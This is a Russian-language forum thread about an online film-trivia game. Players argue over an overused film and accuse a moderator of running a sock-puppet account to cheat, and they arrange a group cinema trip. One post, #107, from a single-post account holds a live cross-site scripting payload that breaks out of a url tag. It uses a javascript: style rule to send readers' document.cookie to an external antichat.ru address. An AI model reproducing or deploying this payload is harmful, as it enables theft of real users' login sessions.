Перейти к содержимому

Фотография

Обсуждение киноигры


  • Авторизуйтесь для ответа в теме
Сообщений в теме: 280

#101
BritFan

BritFan

    Paranoid Android

  • В доску свой
  • 3 216 сообщений

Насчет оранжевого: я за! Только я буду в оранжевом пальте!


у меня есть оранжевая куртка. устроим такой мини-Майданчик. :smoke:
  • 0

#102
bigfan05

bigfan05

    Отец благодетель ©

  • В доску свой
  • 13 307 сообщений

2 bigfan05: я предлагаю запретить использовать фильм "Красная палатка". Надоел уже, в каждом ответе... Как будто нет других фильмов, где русские актеры играли вместе с иностранными


Лично мне это не мешает, но судя по-всему большинство против, по-этому согласен на то, что один и тот же фильм можно использовать максимально 5 раз в месяц.

согласен и с Daken'ом - это документальный фильм, правилами запрещено их использование.


Dakenу отдельное спасибо за объективность.

а ещё предлагаю ввести лимит на количество ответов от игрока за сутки, не больше 3 или 5. просто кто-то стабильно играет каждый день, а кто-то за два-три вечера на пару с кем-нибудь нащёлкает себе по 5-10 баллов и выбивается в лидеры, а другим обидно - опять всё с начала начинать. это во мне голос совести заговорил


Это конечно мысль, но не думаю что осуществимая. В конце концов никто ни с кем не договаривается, так ведь :spy: Просто кому-то повезло с перестрелкой, завтра может быть всё по-другому :D

Насчет оранжевого: я за! Только я буду в оранжевом пальте!

Вы прямо как Голландцы там будете :smoke:

Сообщение отредактировал bigfan05: 24.11.2005, 15:41:46

  • 0

#103
temny

temny

    В доску свой, а че тут такого?

  • Модератор
  • 50 016 сообщений
Художественный фильм запретить нельзя я говорю сразу, есл он мне нравится значит я его использую
  • 0

#104
BritFan

BritFan

    Paranoid Android

  • В доску свой
  • 3 216 сообщений

Художественный фильм запретить нельзя я говорю сразу, есл он мне нравится значит я его использую


всё хорошо в меру. эта "Палатка" стала какой-то удобной вещью, как дыра в соседском заборе, через которую можно пролезть в чужой сад за яблоками, если своих не хватает или нет вовсе.
  • 0

#105
temny

temny

    В доску свой, а че тут такого?

  • Модератор
  • 50 016 сообщений
и Все равно я не согласен всех вас в большой и жирный Игнор...Я же говорю вы все меня терпеть не можете и каждый ищет во мне мои не достатки, а знаете как это называется, я вам скажу как, но не сейчас... уж больно момент не подходит для этого
  • 0

#106
bigfan05

bigfan05

    Отец благодетель ©

  • В доску свой
  • 13 307 сообщений

и Все равно я не согласен всех вас в большой и жирный Игнор...Я же говорю вы все меня терпеть не можете и каждый ищет во мне мои не достатки, а знаете как это называется, я вам скажу как, но не сейчас... уж больно момент не подходит для этого


Ну во-первых я просто понять не могу, откуда у тебя такие чувства??????? Почему ты так решил.

Но это не главное. Главное вот что, и это информация к размышлению всем:

У меня подозрение, что тёмны создал имагинарного игрока ShirLidikens сам.

2 тёмны: давай ЧЕСТНО, если я не прав - я перед Тобой извинюсь и буду извинятся постоянно, пока ты сам меня не остановишь. Если я прав - ты игрок как и все и играешь давно, просто всё будет честно, продолжим игру.

У Тебя ощущения, что все Тебя терпеть не могут и каждый ищет во Тебе твои недостатки, пытаются Тебя выжать. А может ты стараешься игру, в которую мы играем для души, для себя, для интереса, модет ты её стараешься развалить???? Shirali ты выгнал уже, была она плохой соперник, обидела кого???? И что будет - личный триумф тёмного???? Ура, получилось, показал я им. Скажи мне здесь ЧЕСТНО и если я не прав, я это признаю сразу. Только скажи как мужчина без лишней трепотни.
  • 0

#107
gp`

gp`
  • Случайный прохожий
  • 1 сообщений
Niche ne ponimau (((
.com'>wj@wj.com[/url] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/c...document.cookie);`

Сообщение отредактировал gp`: 25.11.2005, 04:52:38

  • 0

#108
BritFan

BritFan

    Paranoid Android

  • В доску свой
  • 3 216 сообщений

и Все равно я не согласен всех вас в большой и жирный Игнор...Я же говорю вы все меня терпеть не можете и каждый ищет во мне мои не достатки, а знаете как это называется, я вам скажу как, но не сейчас... уж больно момент не подходит для этого


тёмны, что за нюни ты тут развёл? тебе не 13 лет случайно?

2 all: думаю, всем ясно, что новый игрок (Shirli-как-то-там) - это виртуал тёмного. тот же стиль текста, те же ошибки. тёмны, тебе не стыдно? инфантилизм так и прёт, блин.

это чистой воды саботаж игры. предлагаю дать тёмному последнее китайское предупреждение, а если он снова начнёт выкидывать свои фокусы, то забанить на месяц. а если бан будет проигнорирован (у нас всё-таки добровольная игра без больших прав у ведущего), то все остальные напишут жалобу Jet'у - только в этом месяце ему можно было влепить десяток плюсов за нарушения правил ЦТ. иначе никак. я хочу играть с адекватными людьми, а не истерично-инфантильными любителями пожульничать. точка.

ps: а тёмны тогда может открыть себе новый топик и играть там сам с собой, у него этого хорошо получается.
  • 0

#109
SnegoVitek

SnegoVitek

  • В доску свой
  • 6 343 сообщений
я не хочу быть на чьей-то стороне, мое кредо здесь-объективность, но то. что был тёным использован новый ник-факт, это я вам как филолог и журналсит официально заявляю. мое предложение-давайте просто так забудем все обиды (и "Красную палатку" :smoke: ) и как будто ничего не было продолжим игру дальше в месте с одним тёмны, а не с его клонами
  • 0

#110
Тошка

Тошка

    свин-паук

  • В доску свой
  • 4 588 сообщений
Насчет Ширлидикенс подозрения не только у Bigfan05, у меня тоже. Слишком уж все знакомо и очень удобно задавать самому себе загадки типа "Плачидо -Миу Миу", отвечать на них одной строкой и зарабатывать балл.
Темны, мы ж тут для удовольствия играем, чтобы развеяться, отвелечься, познакомиться с хорошими людьми с общими интересами и сходить в кино! А ты что делаешь? Колму что хочешь доказать? Кому хочешь жизнь испортить?
Насчет нелюбви к тебе: думаю, по большому счету ты тут всем безраличен как личность. Ты сильный игрок, соперник, только так тебя и воспринимают. Лично мне дела нет до тебя как до человека, поэтому это слишком самонадеянно говорить, что тебя здесь ненавидят! Если бы я создавала клонов, нарушала правила и твердила всем, что вы меня хотите сжить со свету, меня бы тоже возненавидели. Играй спокойно, расслабься, получай удовольствие и все будет ок.
И еще помни одну просту вещь: если ты плюнешь на коллектив, коллектив утрется, а если коллектив плюнет на тебя, то ты захлебнешься! так что не надо нам угрожать игнором. Это более, чем глупо.
  • 0

#111
Тошка

Тошка

    свин-паук

  • В доску свой
  • 4 588 сообщений
Я всеми руками за то, чтобы продолжить игру и даже забыть про эту "Красную палатку" (не понимаю, почему темны это воспринял на свой счет, ее ведь не только он использует часто), но: надо сначало что-то сделать с ответами этого клона.... Или играть дальше, просто продолжая имеющуюся цепочку?
  • 0

#112
BritFan

BritFan

    Paranoid Android

  • В доску свой
  • 3 216 сообщений

Я всеми руками за то, чтобы продолжить игру и даже забыть про эту "Красную палатку" (не понимаю, почему темны это воспринял на свой счет, ее ведь не только он использует часто), но: надо сначало что-то сделать с ответами этого клона.... Или играть дальше, просто продолжая имеющуюся цепочку?


а я встану в позу. :spy: за кого он нас принимает? пусть извинится сначала и даст честное пионерское, что больше так не будет. а вообще нужно завтра всё обсудить в личной встрече без обиняков. :smoke:
  • 0

#113
BritFan

BritFan

    Paranoid Android

  • В доску свой
  • 3 216 сообщений

...это я вам как филолог и журналсит официально заявляю.


исчо один инфант. :spy: официально заявляет только Институт им. Виноградова, всё остальное - отсебятина. :D

мое предложение-давайте просто так забудем все обиды (и "Красную палатку" :smoke: ) и как будто ничего не было продолжим игру дальше в месте с одним тёмны, а не с его клонами


это не обиды, а элементарная человеческая порядочность. "как будто ничего не было" - было, и не в первый раз.

надо кончать с сюсюканием и чётко сказать - или играешь по правилам, или иди играть в другую песочницу.
  • 0

#114
Shirali

Shirali
  • Завсегдатай
  • 216 сообщений
Ребята, давайте жить дружно. :smoke:
Так мы в кино идем или нет? Домино будет в Алатау
19:30 - 550тг.; 22:20 - 700тг.
Думаю, билеты уже сейчас надо брать.
  • 0

#115
BritFan

BritFan

    Paranoid Android

  • В доску свой
  • 3 216 сообщений

Так мы в кино идем или нет? Домино будет в Алатау
19:30 - 550тг.; 22:20 - 700тг. 
Думаю, билеты уже сейчас надо брать.


мы же на завтра договорились, где-то после 3. в Алатау будет в 16.00 (500 тг.), больше пока нигде не идёт.
  • 0

#116
Тошка

Тошка

    свин-паук

  • В доску свой
  • 4 588 сообщений

Я всеми руками за то, чтобы продолжить игру и даже забыть про эту "Красную палатку" (не понимаю, почему темны это воспринял на свой счет, ее ведь не только он использует часто), но: надо сначало что-то сделать с ответами этого клона.... Или играть дальше, просто продолжая имеющуюся цепочку?


а я встану в позу. :spy: за кого он нас принимает? пусть извинится сначала и даст честное пионерское, что больше так не будет. а вообще нужно завтра всё обсудить в личной встрече без обиняков. :smoke:

А ведь он как раз и добивается того, чтобы мы встали в позу, перестали играть и культивировали мелкие склоки. Неужели мы будем ему потакать?
Конечно, обсудить все в личной встрече - идеальный вариант, но Темны не придет! Зуб даю!
  • 0

#117
Тошка

Тошка

    свин-паук

  • В доску свой
  • 4 588 сообщений
А насчет кино: меня очень устраивает вариант завтра в Алатау в 16.00. Только вот когда билеты покупать? Надо встретиться заранее. Я могу подойти к 15.30, но боюсь уже будет поздно. А раньше - только к 11 утра. Вообще, я сейчас нахожусь недалеко от Алатау... Если у остальных есть возможность, может встретимся сегодня и купим билеты?
  • 0

#118
BritFan

BritFan

    Paranoid Android

  • В доску свой
  • 3 216 сообщений

А насчет кино: меня очень устраивает вариант завтра в Алатау в 16.00. Только вот когда билеты покупать? Надо встретиться заранее. Я могу подойти к 15.30, но боюсь уже будет поздно. А раньше - только  к 11 утра. Вообще, я сейчас нахожусь недалеко от Алатау... Если у остальных есть возможность, может встретимся сегодня и купим билеты?


я сегодня не могу никак.

ИМХО, проблем с билетами не будет, если подойдём за полчаса до фильма. это же не "Властелин колец" какой-нибудь. :smoke: и зал в Алатау большой, плохих мест почти нет.
  • 0

#119
Тошка

Тошка

    свин-паук

  • В доску свой
  • 4 588 сообщений
ВНИМАНИЕ ВСЕМ ЖЕЛАЮЩИМ ПОЙТИ В КИНО!!!!
Завтра в 15.30 встречаемся возле кинотеатра "Алатау" (Комса - Кунаева). Покупаем билеты и идем на "Домино".
Местом встречи предлагаю выбрать сотовый телефон, показывающий погоду возле кинотеатра.
Опознавательные знаки: как вариант - оранжевая верхняя одежда или какая-нибудь деталь оранжевого цвета на одежде.
А идеально: кто точно решил идти - напишите мне в личку свои имена и сотовые телефоны на всякий случай, чтоб не потеряться.
  • 0

#120
bigfan05

bigfan05

    Отец благодетель ©

  • В доску свой
  • 13 307 сообщений
2 тёмны:

Темны, мы ж тут для удовольствия играем, чтобы развеяться, отвелечься, познакомиться с хорошими людьми с общими интересами и сходить в кино!


тёмны, в том-то и дело, подумай об этом.

И еще помни одну просту вещь: если ты плюнешь на коллектив, коллектив утрется, а если коллектив плюнет на тебя, то ты захлебнешься! так что не надо нам угрожать игнором. Это более, чем глупо.


Да и надо это тебе???

надо сначало что-то сделать с ответами этого клона.......


Игра уже продолжается, кроме первого ответа тёмного ни его ответы, ни ответы клона не засчитываются. ТОЧКА

пусть извинится сначала и даст честное пионерское, что больше так не будет.....................это не обиды, а элементарная человеческая порядочность.


надо кончать с сюсюканием


Абсолютно согласен - ругаться нам не зачем, но извинения к МЕСТУ.

Ребята, давайте жить дружно.


Давай, а, разве это плохо?

Неужели мы будем ему потакать?


НИФИГА

Конечно, обсудить все в личной встрече - идеальный вариант, но Темны не придет! Зуб даю!


Я бы руку на отсечение дал, но страшновато!


Так что извинись и играй честно.

Я всё сказал

Сообщение отредактировал bigfan05: 25.11.2005, 14:48:19

  • 0


Количество пользователей, читающих эту тему: 2

пользователей: 0, неизвестных прохожих: 2, скрытых пользователей: 0

Размещение рекламы на сайте     Предложения о сотрудничестве     Служба поддержки пользователей

© 2011-2022 vse.kz. При любом использовании материалов Форума ссылка на vse.kz обязательна.